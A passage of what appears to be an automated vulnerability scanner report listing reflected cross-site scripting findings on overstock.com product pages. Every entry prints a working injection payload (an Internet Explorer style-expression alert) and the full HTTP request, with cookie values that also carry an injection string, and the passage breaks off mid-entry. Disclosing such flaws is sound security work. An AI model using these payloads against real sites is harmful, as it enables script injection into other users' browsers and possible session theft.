GET /Home-Garden/American-Atelier-16-piece-Abalone-Dinnerware-Set/5197520/product.html?b828a"style%3d"x%3aexpression(alert(1))"fb590d8c4d9=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.140. http://www.overstock.com/Home-Garden/Anchor-Hocking-4-piece-Stemless-Wine-Glass-Set/3600831/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 35c48"style%3d"x%3aexpression(alert(1))"d00ea22d41f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 35c48"style="x:expression(alert(1))"d00ea22d41f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Anchor-Hocking-4-piece-Stemless-Wine-Glass-Set/3600831/product.html?35c48"style%3d"x%3aexpression(alert(1))"d00ea22d41f=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.141. http://www.overstock.com/Home-Garden/Andiamo-Solid-500-Thread-Count-Egyptian-Cotton-Sheet-Set/4064061/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 79031"style%3d"x%3aexpression(alert(1))"8e8f24245d4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 79031"style="x:expression(alert(1))"8e8f24245d4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Andiamo-Solid-500-Thread-Count-Egyptian-Cotton-Sheet-Set/4064061/product.html?79031"style%3d"x%3aexpression(alert(1))"8e8f24245d4=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.142. http://www.overstock.com/Home-Garden/Antique-Chic-3-piece-Quilt-Set/2521006/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9c96b"style%3d"x%3aexpression(alert(1))"bf9819b8bd6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9c96b"style="x:expression(alert(1))"bf9819b8bd6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Antique-Chic-3-piece-Quilt-Set/2521006/product.html?9c96b"style%3d"x%3aexpression(alert(1))"bf9819b8bd6=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.143. http://www.overstock.com/Home-Garden/Antique-Chic-5-piece-Quilt-Set/3915400/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e04af"style%3d"x%3aexpression(alert(1))"f07952690ed was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e04af"style="x:expression(alert(1))"f07952690ed in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Antique-Chic-5-piece-Quilt-Set/3915400/product.html?e04af"style%3d"x%3aexpression(alert(1))"f07952690ed=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.144. http://www.overstock.com/Home-Garden/Antique-Chic-Bedspread-Set/3570941/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5bae"style%3d"x%3aexpression(alert(1))"51e68b0838 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e5bae"style="x:expression(alert(1))"51e68b0838 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Antique-Chic-Bedspread-Set/3570941/product.html?e5bae"style%3d"x%3aexpression(alert(1))"51e68b0838=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.145. http://www.overstock.com/Home-Garden/Antique-Rose-Quilt-Set/1720379/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f0b76"style%3d"x%3aexpression(alert(1))"ef556a36a9f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f0b76"style="x:expression(alert(1))"ef556a36a9f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Antique-Rose-Quilt-Set/1720379/product.html?f0b76"style%3d"x%3aexpression(alert(1))"ef556a36a9f=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 35b61"style%3d"x%3aexpression(alert(1))"d61e9bb0077 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 35b61"style="x:expression(alert(1))"d61e9bb0077 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Ashton-Cube-Ottoman/3915075/product.html?35b61"style%3d"x%3aexpression(alert(1))"d61e9bb0077=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.147. http://www.overstock.com/Home-Garden/Augusta-Chocolate-8-piece-Bed-in-a-Bag/4600850/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2c3eb"style%3d"x%3aexpression(alert(1))"c04395c6a01 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2c3eb"style="x:expression(alert(1))"c04395c6a01 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Augusta-Chocolate-8-piece-Bed-in-a-Bag/4600850/product.html?2c3eb"style%3d"x%3aexpression(alert(1))"c04395c6a01=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.148. http://www.overstock.com/Home-Garden/Authentic-Hotel-Spa-Turkish-Cotton-Unisex-Bathrobe/4757191/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ed627"style%3d"x%3aexpression(alert(1))"51cc8369783 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ed627"style="x:expression(alert(1))"51cc8369783 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Authentic-Hotel-Spa-Turkish-Cotton-Unisex-Bathrobe/4757191/product.html?ed627"style%3d"x%3aexpression(alert(1))"51cc8369783=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.149. http://www.overstock.com/Home-Garden/Bakers-Rack-with-Wine-Storage/3684083/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2fd5f"style%3d"x%3aexpression(alert(1))"2eaac86dec7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2fd5f"style="x:expression(alert(1))"2eaac86dec7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Bakers-Rack-with-Wine-Storage/3684083/product.html?2fd5f"style%3d"x%3aexpression(alert(1))"2eaac86dec7=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.150. http://www.overstock.com/Home-Garden/Beautyrest-Cotton-Top-Mattress-Pad/3693416/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4631e"style%3d"x%3aexpression(alert(1))"dddbfbee5a3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4631e"style="x:expression(alert(1))"dddbfbee5a3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Beautyrest-Cotton-Top-Mattress-Pad/3693416/product.html?4631e"style%3d"x%3aexpression(alert(1))"dddbfbee5a3=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.151. http://www.overstock.com/Home-Garden/Beautyrest-Micromink-Electric-Throw-Blanket/5258414/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d7960"style%3d"x%3aexpression(alert(1))"39eb48c4354 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d7960"style="x:expression(alert(1))"39eb48c4354 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Beautyrest-Micromink-Electric-Throw-Blanket/5258414/product.html?d7960"style%3d"x%3aexpression(alert(1))"39eb48c4354=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.152. http://www.overstock.com/Home-Garden/Becca-Linen-Dining-Chair/4039200/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d89d9"style%3d"x%3aexpression(alert(1))"5ef72601f3e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d89d9"style="x:expression(alert(1))"5ef72601f3e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Becca-Linen-Dining-Chair/4039200/product.html?d89d9"style%3d"x%3aexpression(alert(1))"5ef72601f3e=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3d1cb"style%3d"x%3aexpression(alert(1))"53fd88e1ab5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3d1cb"style="x:expression(alert(1))"53fd88e1ab5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
